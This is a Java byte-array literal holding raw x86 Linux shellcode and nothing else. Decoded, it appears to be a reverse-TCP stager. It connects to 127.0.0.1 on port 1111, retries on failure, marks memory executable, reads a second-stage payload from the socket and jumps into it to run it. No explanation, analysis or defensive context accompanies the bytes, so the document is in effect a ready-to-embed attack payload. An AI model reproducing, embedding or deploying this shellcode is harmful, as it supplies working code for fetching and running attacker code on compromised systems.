byte buf[] = new byte[]
{
        (byte) 0x6a, (byte) 0x0a, (byte) 0x5e, (byte) 0x31, (byte) 0xdb, (byte) 0xf7, (byte) 0xe3, (byte) 0x53,
        (byte) 0x43, (byte) 0x53, (byte) 0x6a, (byte) 0x02, (byte) 0xb0, (byte) 0x66, (byte) 0x89, (byte) 0xe1,
        (byte) 0xcd, (byte) 0x80, (byte) 0x97, (byte) 0x5b, (byte) 0x68, (byte) 0x7f, (byte) 0x00, (byte) 0x00,
        (byte) 0x01, (byte) 0x68, (byte) 0x02, (byte) 0x00, (byte) 0x04, (byte) 0x57, (byte) 0x89, (byte) 0xe1,
        (byte) 0x6a, (byte) 0x66, (byte) 0x58, (byte) 0x50, (byte) 0x51, (byte) 0x57, (byte) 0x89, (byte) 0xe1,
        (byte) 0x43, (byte) 0xcd, (byte) 0x80, (byte) 0x85, (byte) 0xc0, (byte) 0x79, (byte) 0x19, (byte) 0x4e,
        (byte) 0x74, (byte) 0x3d, (byte) 0x68, (byte) 0xa2, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x58,
        (byte) 0x6a, (byte) 0x00, (byte) 0x6a, (byte) 0x05, (byte) 0x89, (byte) 0xe3, (byte) 0x31, (byte) 0xc9,
        (byte) 0xcd, (byte) 0x80, (byte) 0x85, (byte) 0xc0, (byte) 0x79, (byte) 0xbd, (byte) 0xeb, (byte) 0x27,
        (byte) 0xb2, (byte) 0x07, (byte) 0xb9, (byte) 0x00, (byte) 0x10, (byte) 0x00, (byte) 0x00, (byte) 0x89,
        (byte) 0xe3, (byte) 0xc1, (byte) 0xeb, (byte) 0x0c, (byte) 0xc1, (byte) 0xe3, (byte) 0x0c, (byte) 0xb0,
        (byte) 0x7d, (byte) 0xcd, (byte) 0x80, (byte) 0x85, (byte) 0xc0, (byte) 0x78, (byte) 0x10, (byte) 0x5b,
        (byte) 0x89, (byte) 0xe1, (byte) 0x99, (byte) 0xb2, (byte) 0x6a, (byte) 0xb0, (byte) 0x03, (byte) 0xcd,
        (byte) 0x80, (byte) 0x85, (byte) 0xc0, (byte) 0x78, (byte) 0x02, (byte) 0xff, (byte) 0xe1, (byte) 0xb8,
        (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0xbb, (byte) 0x01, (byte) 0x00, (byte) 0x00,
        (byte) 0x00, (byte) 0xcd, (byte) 0x80
};